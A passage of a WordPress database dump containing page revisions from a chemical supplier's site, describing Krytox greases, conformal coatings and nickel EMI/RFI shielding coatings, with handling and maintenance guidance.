Water/Ethanol</td>\r\n<td width="206">\r\n<p style="text-align: center;">Pass\r\nPass</p>\r\n</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n</tr>\r\n<tr>\r\n<td>Film Stability and Corrosion on Steel</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Base Oil Viscosity, 40 °C (104 °F), cSt</td>\r\n<td style="text-align: center;">22.8</td>\r\n<td style="text-align: center;">77.8</td>\r\n<td style="text-align: center;">243</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Useful Range, °C</td>\r\n<td style="text-align: center;">–57 to 149</td>\r\n<td style="text-align: center;">–40 to 232</td>\r\n<td style="text-align: center;">–34 to 288</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/krytox/">If these greases are not right for you, please click here to learn more about Krytox greases and oils.</a>', 'MIL PRF-27617 Greases—Grease, Aircraft and Instrument, Fuel- and Oxidizer-Resistant', '', 'inherit', 'closed', 'closed', '', '2552-revision-v1', '', '', '2016-10-12 15:31:06', '2016-10-12 15:31:06', '', 2552, 'https://www.miller-stephenson.com/2552-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2562, 2, '2016-10-25 17:47:41', '2016-10-25 17:47:41', '<h1><span style="font-size: 120%;"><strong>Krytox Corrugator Greases</strong></span></h1>\n<h4><strong>Product Information</strong></h4>\nKrytox PFPE/PTFE corrugator greases have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Krytox lubricants help eliminate bearing lubrication as a cause of premature corrugator roll failures. Corrugator roll changes are significantly easier and quicker on single facers lubricated with Krytox corrugator greases.\n<h4><strong>Corrugators choose Krytox™ lubricants for many reasons:</strong></h4>\n<ul>\n 	<li>Most productive lubrication system for single facer bearings among all paper corrugating plants, equipment OEMs, and corrugator roll rebuilders</li>\n 	<li>Most thermally stable H1 base oil available</li>\n 	<li>Reduced risk of bearing failure</li>\n 	<li>Conversion support and PFPE lubrication/application training available</li>\n</ul>\nKrytox greases for the corrugating industry include:\n\n<strong>Krytox Corrugator <a href="https://www.miller-stephenson.com/product/krytox-226-fg/">226 FG</a>, <a href="https://www.miller-stephenson.com/product/krytox-227-fg/">227 FG</a> Greases</strong>—The standard in PFPE/PTFE greases, recognized by OEMs and operators alike as the premium performing high temperature grease. These products are NSF H-1 Food Grade certified, providing safe, non-toxic, and inert performance in food-related operations.\n<h4><strong>Safe Handling</strong></h4>\nFor detailed information, refer to the MSDS for the specific grade of Krytox fluorinated grease that you are using. Highlights are:\n<ul>\n 	<li>When handling, wear any type of impervious gloves.</li>\n 	<li>Wash hands after use.</li>\n 	<li>Do not smoke tobacco that may have been contaminated with Krytox grease. Inhalation of fumes from burning Krytox grease may cause a temporary flu-like illness with symptoms such as fever, chills, and sometimes cough. Symptoms are typically gone after 1–2 days.</li>\n 	<li>When handling Krytox solvent or HC cleaner, use adequate ventilation, and wear eye protection and any type of impervious rubber gloves.</li>\n</ul>\n<h4><strong>Key Points</strong></h4>\n<ul>\n 	<li>Make sure the bearings are clean and free of preservatives, hydrocarbon oils, greases, and residues before lubricating with Krytox grease; use Krytox HC Plus Cleaner or equivalent. Contaminating Krytox grease with any other lubricant will impair its lubricating value.</li>\n 	<li>If using pails versus cartridges, slight pooling of oil on top of the Krytox grease can occur, particularly if it has been sitting unused for a while. Simply mix it back in with a clean stirrer.</li>\n 	<li>Use special grease fittings—pin or button head—for Krytox grease to prevent contamination with hydrocarbon or synthetic lubricants.</li>\n 	<li>Use a dedicated grease gun (labeled Krytox grease only) with a swivel coupling matched to the special pin or button head grease fittings (bearing inlet ports). Fill the bearings and bearing housings completely to prevent air pockets that can collect water and debris.</li>\n 	<li>Prevent corrugating process materials (e.g., waxes and paper debris) from entering the bearings.</li>\n</ul>\n<h4><strong>Relubrication</strong></h4>\n<ul>\n 	<li>Wipe the inlet fittings clean with a clean cloth to prevent contamination of the Krytox grease.</li>\n 	<li>Add/replenish Krytox™ grease every three months. Pump about 1 lb (1/2 cartridge), or whatever is necessary, of Krytox™ grease into the bearing button or pin head grease fittings to force some existing grease out through the seals. It is best to rotate bearings while adding grease to prevent “channeling” of the new grease through the bearing. A more conservative approach is to follow this practice more frequently, say once a month; proportionately less Krytox grease would be needed. Pay attention to plant safety procedures when working with moving equipment.</li>\n 	<li>Compare expelled/purged grease with the “Color Guide” and service as noted. (This guide applies to normal wear only; contaminants will alter the grease’s appearance.)</li>\n 	<li>Wipe off excess Krytox grease from equipment surfaces to prevent buildup of dirt/debris attracted to surface grease.</li>\n</ul>\n<h4><strong>Disposal and Storage</strong></h4>\n<ul>\n 	<li>Properly dispose of used Krytox grease purged from outlet ports, seals, and/or shaft-bearing clearances according to local, state, and federal codes.</li>\n 	<li>Keep all Krytox grease containers covered to prevent contamination.</li>\n</ul>\n&nbsp;\n<table width="1153">\n<tbody>\n<tr>\n<td width="223"><strong>Color Guide</strong></td>\n<td width="242"></td>\n<td width="688"></td>\n</tr>\n<tr>\n<td><strong>Color</strong></td>\n<td><strong>Contamination</strong></td>\n<td><strong>Recommendation</strong></td>\n</tr>\n<tr>\n<td>White</td>\n<td>None</td>\n<td>Grease in good condition: creamy consistency.</td>\n</tr>\n<tr>\n<td>Gray</td>\n<td>0.0-0.1% iron</td>\n<td>Grease in good condition, normal wear in bearing; creamy consistency</td>\n</tr>\n<tr>\n<td>Tan</td>\n<td>0.0-0.4% iron</td>\n<td>Add grease until cavity is full, bearing OK.</td>\n</tr>\n<tr>\n<td>Brown</td>\n<td>0.0-0.8% iron</td>\n<td>Flush bearing with grease until color lightens to tan.</td>\n</tr>\n<tr>\n<td>Dark Brown</td>\n<td>Greater than 0.8% iron</td>\n<td>Check bearing for play and noise. If OK, flush/purge with new Krytox™ grease. If not OK, schedule bearing change.</td>\n</tr>\n<tr>\n<td>Black</td>\n<td></td>\n<td>Replace bearing.</td>\n</tr>\n</tbody>\n</table>\n[ux_product_categories number="10" parent="0" columns="4" title="Co" ]\n\nTo learn more about Krytox corrugator greases please <a href="https://www.miller-stephenson.com/contact/">contact us by clicking here.</a>', 'Krytox Corrugator Greases', '', 'inherit', 'closed', 'closed', '', '2308-autosave-v1', '', '', '2016-10-25 17:47:41', '2016-10-25 17:47:41', '', 2308, 'https://www.miller-stephenson.com/2308-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2563, 2, '2016-10-12 15:42:14', '2016-10-12 15:42:14', '<h1><span style="font-size: 120%;"><strong>Krytox Corrugator Greases</strong></span></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox PFPE/PTFE corrugator greases have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Krytox lubricants help eliminate bearing lubrication as a cause of premature corrugator roll failures. Corrugator roll changes are significantly easier and quicker on single facers lubricated with Krytox corrugator greases.\r\n<h4><strong>Corrugators choose Krytox™ lubricants for many reasons:</strong></h4>\r\n<ul>\r\n 	<li>Most productive lubrication system for single facer bearings among all paper corrugating plants, equipment OEMs, and corrugator roll rebuilders</li>\r\n 	<li>Most thermally stable H1 base oil available</li>\r\n 	<li>Reduced risk of bearing failure</li>\r\n 	<li>Conversion support and PFPE lubrication/application training available</li>\r\n</ul>\r\nKrytox greases for the corrugating industry include:\r\n\r\n<strong>Krytox Corrugator 226 FG, 227 FG Greases</strong>—The standard in PFPE/PTFE greases, recognized by OEMs and operators alike as the premium performing high temperature grease. These products are NSF H-1 Food Grade certified, providing safe, non-toxic, and inert performance in food-related operations.\r\n<h4><strong>Safe Handling</strong></h4>\r\nFor detailed information, refer to the MSDS for the specific grade of Krytox fluorinated grease that you are using. Highlights are:\r\n<ul>\r\n 	<li>When handling, wear any type of impervious gloves.</li>\r\n 	<li>Wash hands after use.</li>\r\n 	<li>Do not smoke tobacco that may have been contaminated with Krytox grease. Inhalation of fumes from burning Krytox grease may cause a temporary flu-like illness with symptoms such as fever, chills, and sometimes cough. Symptoms are typically gone after 1–2 days.</li>\r\n 	<li>When handling Krytox solvent or HC cleaner, use adequate ventilation, and wear eye protection and any type of impervious rubber gloves.</li>\r\n</ul>\r\n<h4><strong>Key Points</strong></h4>\r\n<ul>\r\n 	<li>Make sure the bearings are clean and free of preservatives, hydrocarbon oils, greases, and residues before lubricating with Krytox grease; use Krytox HC Plus Cleaner or equivalent. Contaminating Krytox grease with any other lubricant will impair its lubricating value.</li>\r\n 	<li>If using pails versus cartridges, slight pooling of oil on top of the Krytox grease can occur, particularly if it has been sitting unused for a while. Simply mix it back in with a clean stirrer.</li>\r\n 	<li>Use special grease fittings—pin or button head—for Krytox grease to prevent contamination with hydrocarbon or synthetic lubricants.</li>\r\n 	<li>Use a dedicated grease gun (labeled Krytox grease only) with a swivel coupling matched to the special pin or button head grease fittings (bearing inlet ports). Fill the bearings and bearing housings completely to prevent air pockets that can collect water and debris.</li>\r\n 	<li>Prevent corrugating process materials (e.g., waxes and paper debris) from entering the bearings.</li>\r\n</ul>\r\n<h4><strong>Relubrication</strong></h4>\r\n<ul>\r\n 	<li>Wipe the inlet fittings clean with a clean cloth to prevent contamination of the Krytox grease.</li>\r\n 	<li>Add/replenish Krytox™ grease every three months. Pump about 1 lb (1/2 cartridge), or whatever is necessary, of Krytox™ grease into the bearing button or pin head grease fittings to force some existing grease out through the seals. It is best to rotate bearings while adding grease to prevent “channeling” of the new grease through the bearing. A more conservative approach is to follow this practice more frequently, say once a month; proportionately less Krytox grease would be needed. Pay attention to plant safety procedures when working with moving equipment.</li>\r\n 	<li>Compare expelled/purged grease with the “Color Guide” and service as noted. (This guide applies to normal wear only; contaminants will alter the grease’s appearance.)</li>\r\n 	<li>Wipe off excess Krytox grease from equipment surfaces to prevent buildup of dirt/debris attracted to surface grease.</li>\r\n</ul>\r\n<h4><strong>Disposal and Storage</strong></h4>\r\n<ul>\r\n 	<li>Properly dispose of used Krytox grease purged from outlet ports, seals, and/or shaft-bearing clearances according to local, state, and federal codes.</li>\r\n 	<li>Keep all Krytox grease containers covered to prevent contamination.</li>\r\n</ul>\r\n&nbsp;\r\n<table width="1153">\r\n<tbody>\r\n<tr>\r\n<td width="223"><strong>Color Guide</strong></td>\r\n<td width="242"></td>\r\n<td width="688"></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Color</strong></td>\r\n<td><strong>Contamination</strong></td>\r\n<td><strong>Recommendation</strong></td>\r\n</tr>\r\n<tr>\r\n<td>White</td>\r\n<td>None</td>\r\n<td>Grease in good condition: creamy consistency.</td>\r\n</tr>\r\n<tr>\r\n<td>Gray</td>\r\n<td>0.0-0.1% iron</td>\r\n<td>Grease in good condition, normal wear in bearing; creamy consistency</td>\r\n</tr>\r\n<tr>\r\n<td>Tan</td>\r\n<td>0.0-0.4% iron</td>\r\n<td>Add grease until cavity is full, bearing OK.</td>\r\n</tr>\r\n<tr>\r\n<td>Brown</td>\r\n<td>0.0-0.8% iron</td>\r\n<td>Flush bearing with grease until color lightens to tan.</td>\r\n</tr>\r\n<tr>\r\n<td>Dark Brown</td>\r\n<td>Greater than 0.8% iron</td>\r\n<td>Check bearing for play and noise. If OK, flush/purge with new Krytox™ grease. If not OK, schedule bearing change.</td>\r\n</tr>\r\n<tr>\r\n<td>Black</td>\r\n<td></td>\r\n<td>Replace bearing.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about Krytox corrugator greases please <a href="https://www.miller-stephenson.com/contact/">contact us by clicking here.</a>', 'Krytox Corrugator Greases', '', 'inherit', 'closed', 'closed', '', '2308-revision-v1', '', '', '2016-10-12 15:42:14', '2016-10-12 15:42:14', '', 2308, 'https://www.miller-stephenson.com/2308-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2564, 3, '2016-10-12 16:06:40', '2016-10-12 16:06:40', '<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Conformal coatings</a> are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\n\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\n<ul>\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\n 	<li>Minimal effect on component weight</li>\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\n 	<li>Minimize environmental stress on a PCB assembly</li>\n</ul>\nAs mentioned there are four general classes of conformal coating to choose from:\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\n</ul>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\n</ul>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\n</ul>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> – Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\n</ul>\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\n\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\n\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\n<ol>\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\n</ol>\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\n\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\n<ul>\n 	<li>Simple application- Convenient aerosol or bulk</li>\n 	<li>Specialized formulas to provide uniform, thin films</li>\n 	<li>Easy removal, repair and replacement</li>\n 	<li>100% non-flammable; low odor formulations</li>\n 	<li>Superior Protection against thermal and mechanical shock</li>\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\n</ul>\n[ux_product_categories ids="29,28,27,30" number="10"]\n\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-autosave-v1', '', '', '2016-10-12 16:06:40', '2016-10-12 16:06:40', '', 2474, 'https://www.miller-stephenson.com/2474-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2565, 3, '2016-10-12 16:06:42', '2016-10-12 16:06:42', '<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Conformal coatings</a> are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are four general classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> – Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-12 16:06:42', '2016-10-12 16:06:42', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2566, 0, '2016-10-12 17:25:46', '2016-10-12 17:25:46', '', '', '', 'publish', 'closed', 'closed', '', '2566', '', '', '2016-10-12 17:25:46', '2016-10-12 17:25:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/2566/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2567, 3, '2016-10-12 18:46:02', '2016-10-12 18:46:02', '', 'ms-475c_477c', '', 'inherit', 'closed', 'closed', '', 'ms-475c_477c-4', '', '', '2016-10-12 18:46:02', '2016-10-12 18:46:02', '', 621, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-475C_477C-2.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2568, 3, '2017-01-12 14:48:53', '2017-01-12 14:48:53', 'Miller-Stephenson\'s Nickel Conductive Coatings offers superior protection and shielding in a fast drying and curing formulation. These Nickel Conductive Coatings allow the greater use of plastic enclosures/housings in manufacturing digital electronic devices has increased the need for reliable EMI/RFI coating solutions. A range of compounds have been developed that offer different conductive fillers to provide numerous resistance and attenuation levels. These systems can be applied by brushing and conventional spray techniques. Benefits of Miller-Stephenson Conductive Coating is the following:\n<ul>\n 	<li>Protect electronic devices from electromagnetic pulses</li>\n 	<li>Superior shielding performance</li>\n 	<li>Minimal tack free time</li>\n 	<li>Cost effective alternative to other shielding methods</li>\n 	<li>Provide uniform thickness</li>\n 	<li>Anti-static</li>\n 	<li>Exceptional point to point resistivity</li>\n 	<li>For high and low volume applications</li>\n</ul>\nAn excellent way to limit EMI/RFI emissions is with a Miller-Stephenson\'s Nickel Conductive Coatings. MS-478G is a black coating, which may be applied in a 2 mil layer to absorb EMI/RFI over a broad frequency range. MS-478G is general purpose shielding spray for use on plastic electronics enclosures. Consists of a tough, durable acrylic base pigmented with high quality nickel flakes. This coating can be used effectively with Acrylic, Polycarbonate, ABS, Polystyrene, PVC and other plastics.\n\nRFI Nickel Conductive Coating can be applied by dipping, brushing and/or spraying. For best results when spraying, maintain pressure between 20-30 psi; adjust nozzle for acceptable spray pattern. Several light coats (2-3) applied from a distance of 10-12 inches will provide a 1.5-2.0 mil coating. Allow each coating to dry for 30 minutes before applying another coat. Do not dilute or contaminate with water.\n\nApplication for Miller-Stephenson\'s Conductive Coating include pad printing, screen-printing, spraying, dipping and syringe dispensing. Products can be applied to flexible or rigid substrates and can be printed on uneven or contoured surfaces. They feature good adhesion to a variety of substrates including Kapton, Mylar, glass and ceramics.\n\nAgitate material before and during use to prevent settling of the active ingredients. Apply to a clean, dry surface in a well-ventilated area at temperatures between 70-85ºF.\n\n&nbsp;', 'RFI / EMI Nickel Conductive Coating MS-485G', 'A nonflammable conductive coating that shields RFI / EMI emissions over a broad range of frequencies. Coating is dry and functional within minutes of application. Recommended for application on plastic housings, enclosures, and resins. This coating can be used effectively with acrylic, polycarbonate, ABS, polystyrene, PVC and other plastics. 100% non-flammable and contains no ODC (ozone depleting chemicals).', 'inherit', 'closed', 'closed', '', '1722-autosave-v1', '', '', '2017-01-12 14:48:53', '2017-01-12 14:48:53', '', 1722, 'https://www.miller-stephenson.com/1722-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2569, 3, '2016-10-12 18:50:03', '2016-10-12 18:50:03', '', 'ms-487g', '', 'inherit', 'closed', 'closed', '', 'ms-487g', '', '', '2016-10-12 18:50:03', '2016-10-12 18:50:03', '', 1722, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-487G.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2570, 3, '2016-10-12 19:07:38', '2016-10-12 19:07:38', '', 'Nickel Conductive Coatings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_418090675', '', '', '2016-11-24 03:58:05', '2016-11-24 03:58:05', '', 1722, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/shutterstock_418090675.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2571, 2, '2016-10-12 19:12:36', '2016-10-12 19:12:36', '<h1><strong>MIL PRF-27617 Greases</strong></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox™ oils and MIL PRF-27617 greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox™ oils and greases are silicone free and do not damage plastics or elastomers, or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial, and semiconductor applications, as well as solving many other routine lubrication problems.\r\n\r\nKrytox™ greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written.\r\n\r\nThis is the latest data from the recertification that is required every five years. Krytox™ greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n<h4><strong>Typical Applications</strong></h4>\r\nApplications for Krytox™ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity, or down time, Krytox™ is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox™ oils and greases are applied on various settings, spanning from bearings and sealants to O-rings and oxygen systems. Krytox™ is a valuable asset to the aerospace industry, due to its superior performance in a wide range of temperatures scaling from 70 to 399 ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox™ lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the\r\naerospace industry, it can be expected that Krytox™ delivers a high level of product excellence.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">Krytox™  240 AC, 240 AB, and 240 AZ</a> gr-1 are MIL PRF-27617 greases and now have <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF approval for incidental food contact (H-1)</a> in and around food processing areas.\r\n<h4><strong>Preparation Before Packing Bearings With Grease</strong></h4>\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high speed tests, where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting, so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden, and can create debris that will contaminate the grease.\r\n<h4><strong>Storage and Shelf Life</strong></h4>\r\nKrytox™ grease and oil lubricants have an indefinite shelf life, if unopened and stored in a clean dry location.\r\n\r\nCAGE No.: 43S57\r\n\r\nSIC Code: 2992 Lubricating Oils and Greases\r\n\r\nNAICS Code: 324191 Lubricating Oils and Greases Manufacturing\r\n\r\nDUNS: 557214574\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> MIL PRF-27617 Greases</strong></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>240 AZ</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>240 AB</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>240 AC</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Qualification Reference Number, 1 Oct 